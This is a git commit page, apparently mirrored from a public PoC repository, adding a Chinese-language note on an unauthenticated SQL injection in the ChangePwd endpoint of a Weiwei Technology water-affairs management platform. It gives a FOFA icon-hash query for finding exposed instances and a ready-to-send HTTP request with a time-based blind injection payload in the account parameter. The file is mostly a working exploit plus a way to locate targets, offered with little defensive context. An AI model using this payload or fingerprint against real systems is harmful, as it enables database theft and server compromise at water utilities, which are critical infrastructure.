mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md
This commit is contained in:
parent
a4f3682261
commit
bf0b3a2cd3
20
潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md
Normal file
20
潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md
Normal file
@ -0,0 +1,20 @@
|
||||
## 潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞
|
||||
|
||||
潍微科技-水务信息管理平台 ChangePwd 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
|
||||
|
||||
## fofa
|
||||
```
|
||||
icon_hash="-491165370"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /Account/ChangePwd?oldpwd=123456&newpwd=123456&conpwd=123456&account=1%27;waitfor%20delay%20%270:0:5%27--+ HTTP/1.1
|
||||
Host: your-ip
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Connection: close
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user